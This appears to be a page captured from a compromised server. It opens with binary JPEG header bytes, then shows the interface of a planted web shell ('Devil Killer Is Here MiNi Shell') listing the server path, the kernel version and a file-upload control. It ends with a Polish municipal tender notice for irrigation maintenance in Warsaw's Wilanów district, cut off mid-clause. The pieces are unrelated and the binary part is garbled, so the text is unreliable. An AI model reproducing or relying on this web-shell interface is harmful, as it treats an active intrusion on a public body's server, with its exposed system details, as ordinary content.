JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210618/0008805701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00088057 z dnia 2021-06-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja systemów nawadniania zlokalizowanych na terenie Wilanowa wraz z rozbudową systemu nawadniania skweru przy ul. F. Klimczaka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja systemów nawadniania zlokalizowanych na terenie Wilanowa wraz z rozbudową systemu nawadniania skweru przy ul. F. Klimczaka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8ae1a36e-d001-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00088057</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000252/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Konserwacja, dozór techniczny modernizacja urządzeń wodnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż: - Zamawiający udostępnia<br/>daneosobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 zdnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danychosobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm.<br/>3) ),zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków<br/>ochronyprawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych,do upływu terminu do ich wniesienia.- Skorzystanie przez osobę, której dane osobowe<br/>dotyczą, zuprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art.<br/>16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzieleniezamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą.- W postępowaniu o udzielenie zamówienia zgłoszenie żądania<br/>ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">15/WOŚ/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 61832,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A.	Przedmiotem zamówienia jest konserwacja systemów nawadniania na terenie Dzielnicy Wilanów m.st. Warszawy wraz z budową systemu automatycznego nawadniania w obrębie skweru przyległego do Ratusza Wilanów: <br/>1) realizacja usługi polegająca na rozbudowie istniejącego systemu automatycznego nawadniania zlokalizowanego wokół budynku Urzędu Dzielnicy Wilanów poprzez wykonanie dodatkowych sekcji systemu na terenie skweru przyległego do budynku przy ul. Klimczaka 2. <br/>Do obowiązków Wykonawcy należy przygotowania dokumentacji technicznej dla nowo budowanych sekcji systemu automatycznego nawadniania oraz wykonanie prac i uruchomienie systemu automatycznego nawadniania. Rozbudowa systemu powinna zostać wykonana w oparciu o materiały i zasady zgodne ze sztuką budowania systemów automatycznego nawadniania.<br/>2) obsługa rozbudowanego systemu przy ul. Klimczaka oraz istniejących automatycznych systemów nawadniających zlokalizowanych na skwerze przy ul. Prymasa Augusta Hlonda i na skwerze Prymasowskim przy ul. Stanisława Kostki Potockiego w Warszawie.<br/>Szczegóły realizacji przedmiotu zamówienia zostały określone w dokumentach zamówienia w szczególności w opisie przedmiotu zamówienia stanowiącym załącznik nr 5 do SWZ oraz wzorze umowy stanowiącym załącznik nr 7 do SWZ. Usługi winny być zrealizowane zgodnie z zasadami współczesnej wiedzy technicznej przy zastosowaniu obowiązujących przepisów, norm i specyfikacji, w oparciu o dokumenty zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50000000-5 - Usługi naprawcze i konserwacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112712-9 - Roboty w zakresie kształtowania ogrodów</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7. W<br/>okresie 3 lat od dnia udzielenia zamówienia podstawowego, Zamawiający udzieli zamówienia<br/>polegającego na powtórzeniu usług związanych z konserwacją systemów automatycznego<br/>nawadniania na terenach: skwer przy ul. Klimczaka, Skwer przy ul. Prymasa Augusta Hlonda, ul.Kostki Potockiego. Prace będą polegały na:1) Kontroli prawidłowości działania systemu min. 2 razy w<br/>miesiącu, polegającej na:sprawdzeniu pod kątem ew. uszkodzeń eksploatacyjnych lub<br/>spowodowanych przez osoby trzecie (np. podczas prac ogrodniczych, budowlanych lub brukarskich a<br/>także w wyniku przypadków wandalizmu), oraz dokonywanie niezbędnych napraw polegających w<br/>szczególności na wymianie:a) linii kroplującej (do 100 mb w ramach realizacji zamówienia),b) trójników,<br/>łączników oraz kolan (do 30 szt. w ramach realizacji zamówienia),c) korpusów zraszaczy (do 10 szt. w<br/>ramach realizacji zamówienia),d) filtrów w zraszaczach (do 10 szt. w ramach realizacji zamówienia),e)<br/>dysz zraszających (do 10 szt. typu ProSpray/lub równoważny w ramach realizacji zamówienia),f) dysz<br/>zraszających (do 10 szt. typu Rotator/lub równoważny w ramach realizacji zamówienia),g)<br/>elektrozaworów (2 szt. w ramach realizacji zamówienia),h) baterii podtrzymującej (1 szt. w ramach<br/>realizacji zamówienia),i) baterii sterującej (1 szt. w ramach realizacji zamówienia),j) czyszczenie filtrów<br/>(do 4 razy w ramach realizacji zamówienia).2) Dostosowaniu procentowego zużycia wody pod kątem<br/>prognozowanych warunków atmosferycznych w danym okresie czasu.3) Pozostanie w gotowości do<br/>ewentualnej interwencji w przypadku nagłej awarii systemu. Czas reakcji max do 5 h zgodnie z ilością<br/>godzin określoną w ofercie oraz do 3 dni roboczych na przywrócenie prawidłowości działania systemu<br/>automatycznego nawadniania.4) Wyłączenie oraz konserwacja systemu, wraz z przygotowaniem go do<br/>zimy (ok. 15 listopada br. w zależności od warunków atmosferycznych i uzgodnień z<br/>Zamawiającym).Zamówienie powtórzone zostanie udzielone na warunkach zgodnych z warunkami, na<br/>podstawie których zostanie udzielone zmówienie podstawowe, zgodnie ze wzorem umowy do<br/>zmówienia podstawowego. Wartość zamówienia powtórzonego wynosi 30.500,00 zł netto</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzony okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do interwencji w celu zabezpieczenia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej.Na potwierdzenie spełnienia<br/>warunku udziału Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie<br/>wykonał lub wykonuje co najmniej 1 usługę polegającą na konserwacji / serwisowaniu lub<br/>utrzymaniu systemu nawadniania, o wartości nie mniejszej niż 15.000,00 zł brutto*.*- przez<br/>wartość 1 usługi Zamawiający rozumie łączną wartość wykonanych usług w ramach jednej<br/>umowy, w przypadku usług niezakończonych –Zamawiający uzna warunek za spełniony, jeżeli<br/>na dzień składania ofert część usługi już wykonanej spełnia wymagania określone przez<br/>Zamawiającego powyżej (o wartości zrealizowane części zamówienia wynoszącej co najmniej15.000,00 zł brutto). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym mowa w III.C.1.2)a) SWZ<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego- wg<br/>wzoru stanowiącego Załącznik nr 6 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Brak wymagań <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga w niniejszym postepowaniu złożenia w Systemie wypełnionego<br/>formularza oferty o treści zgodnej z założeniami SWZ. Ponadto wraz z ofertą należy złożyć: a)<br/>Oświadczenie o braku podstaw do wykluczenia Wykonawcy b) Oświadczenie wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), z którego wynika, które<br/>roboty budowlane lub usługi, wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), c)<br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy (z art. 125 ust. 1<br/>ustawy), d) Oświadczenie o podstawach wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5<br/>(jeżeli dotyczy) e) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np.<br/>pełnomocnictwo, odpis z właściwego rejestru, np. Krajowego Rejestru Sądowego, informacja o<br/>wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej<br/>Polskiej lub umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami; f) Dokument<br/>potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie<br/>wynikać przedmiotowe umocowanie, pełnomocnik może być ustanowiony do reprezentowania<br/>Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>Dokument winien być załączony w formie oryginału lub odpowiednio poświadczonego<br/>odwzorowania .g) Zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Określone w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę postanowień umowy według wzoru umowy, załącznik nr 7 do<br/>SWZ, w szczególności: § 5 ust. 3 Podwykonawcy (wzoru mowy)3.Zamawiający dopuszcza<br/>zmianę podwykonawcy z zastrzeżeniem, że jeśli Wykonawca w procedurze udzielenia<br/>niniejszego zamówienia, w wyniku którego zawarto niniejszą umowę posłużył się<br/>doświadczeniem podwykonawcy, nowy podwykonawca musi również wykazać się<br/>doświadczeniem wymaganym przez Zamawiającego w procedurze o udzielenie zamówienia<br/>będącego przedmiotem umowy. Zmiana podwykonawcy wymaga wcześniejszego tj. w terminie<br/>10 dni przed dniem świadczenia usługi przez podwykonawcę, powiadomienia Zamawiającego.<br/>Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby<br/>Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu,<br/>Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca<br/>lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego<br/>zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.§ 8 ust. 12<br/>Rozliczenie (wzoru mowy)12.Zamawiający dopuszcza zmianę formy rozliczenia za realizację<br/>niniejszej umowy w zakresie wynikającym z ewentualnego wprowadzenia przez m.st. Warszawa<br/>modyfikacji w tym zakresie. Zmiana sposobu rozliczenia nastąpi na podstawie stosownego<br/>aneksu. § 11 Zakres zmian umowy (wzoru mowy)1. Poza przypadkami wymienionymi w art. 455<br/>ust. 1 pkt 3 i 4 oraz ust 2 ustawy Prawo zamówień publicznych, przewiduje się możliwość<br/>dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, jeśli zachodzi co najmniej jedna z<br/>następujących okoliczności wymienionych poniżej:1) zmiany wynikają z powszechnie<br/>obowiązujących przepisów prawa, ogłoszonych po dniu zawarcia umowy, w zakresie mającym<br/>wpływ na realizację umowy,2) zaistnienia, po zawarciu umowy przypadku siły wyższej, przez<br/>którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej<br/>strony więzi prawnej:a) o charakterze niezależnym od stron,b) którego strony nie mogły<br/>przewidzieć przed zawarciem umowy,c) którego nie można uniknąć ani któremu strony nie<br/>mogły zapobiec przy zachowaniu należytej staranności,d) której nie można przypisać drugiej<br/>stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania<br/>wojenne, stan epidemii, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie<br/>energii elektrycznej, promieniowanie lub skażenie.3) zaistnienia okoliczności leżących po stronie<br/>Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi<br/>lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w<br/>chwili zawarcia umowy – zmianie może ulec termin realizacji umowy,4) sposobu dostarczania<br/>Zamawiającemu faktur z powodu zmian regulacji wewnętrznych lub zmian organizacyjnych<br/>Zamawiającego,5) zmiany rachunku bankowego Wykonawcy,2. Zamawiający zobowiązuje się<br/>do niezwłocznego powiadomienia Wykonawcy o zaistnieniu okoliczności, o których mowa ust. 1<br/>pkt. 3 powyżej.3. Zamawiający dopuszcza zmianę Podwykonawców z zastrzeżeniem<br/>wskazanym w § 5 ust.3 umowy. 4. Zmiany umowy, o których mowa w ust. 1 niniejszego<br/>paragrafu 